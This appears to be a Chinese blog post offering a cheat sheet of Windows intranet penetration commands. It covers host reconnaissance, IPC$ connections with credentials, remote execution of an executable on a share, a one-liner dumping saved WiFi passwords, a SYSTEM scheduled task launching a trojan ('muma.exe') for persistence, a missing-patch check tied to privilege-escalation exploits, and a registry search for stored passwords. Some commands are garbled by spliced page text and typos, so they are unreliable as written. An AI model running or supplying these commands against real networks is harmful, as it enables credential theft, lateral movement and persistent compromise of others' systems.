mysql tracert命令详解,【奇技淫巧】内网渗透命令大全

2.基本内网渗透命令:

ipconfig/all

//查看IP地址

ipconfig /release

//释放地址

ipconfig /renew

重新获取Ip地址

whoami

//查询账号所属权限

whoami/all

//查看sid值

systeminfo

//查询系统以及补丁信息

tasklist /svc

//查看进程

taskkill /im 进程名称(cmd)

//结束进程

taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)

wmic qfe get hotfixid

//查看已安装过得补丁,这个很实用

wmic qfe list full /format:htable > hotfixes.htm

//详细的补丁安装

wmic qfe

//查询补丁信息以及微软提供的下载地址

ping hostname(主机名)

//显示该机器名的IP

net start

//查看当前运行的服务

net user

//查看本地组的用户

net localhroup administrators

//查看本机管理员组有哪些用户

net user

//查看会话

net session

//查看当前会话

net share

//查看SMB指向的路径[即共享]

wmic share get name,path

//查看SMB指向的路径

wmic nteventlog get path,filename,writeable

//查询系统日志文件存储位置

net use IPipc$ password /user:username

//建立IPC会话(工作组模式)

net use z: 192.168.1.1

//建立映射到本机Z盘

net time 172.16.16.2

//查询共享主机的是

at 172.16.16.2 13:50 c:windows2009.exe

//在共享主机上执行

netstat -ano

//查看开放的端口

netstat -an | find “3389”

//找到3389端口

net accounts

//查看本地密码策略

nbtstat –A ip

//netbiso查询

net view

//查看机器注释或许能得到当前活动状态的机器列表,如果

禁用netbios就查看不出来

echo %PROCESSOR_ARCHITECTURE%

//查看系统是32还是64位

set

//查看系统环境设置变量

net start

//查看当前运行的服务

wmic service list brief

//查看进程服务

wmic process list brief

//查看进程

wmic startup list brief

//查看启动程序信息

wmic product list brief

//查看安装程序和版本信息(漏洞利用线索)

wmic startup list full

//识别开机启动的程序

wmic process where(deion="mysqld.exe")

>>mysql.log

//获取软件安装路径

for /f "skip=9 tokens=1,2 delims=:" %i in ('ne

tsh wlan showprofiles') do @echo %j | findstr

-i -v echo | netsh wlan show profiles %jkey=clear返回搜狐,查看更多

//一键获取wifi密码

if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)

//查看是否支持posershell

qwinsta

//查看登录情况

schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7

//添加计划任务

set KB2829361=MS13-046&set KB2830290=MS13-046&setKB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&setKB3077657=MS15-077&set KB3045171=MS15-051&setKB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&setKB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f/q /a a.txt

//windows未打补丁情况

REG query HKCU /v "pwd" /s

//获取保存到注册表中的密码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值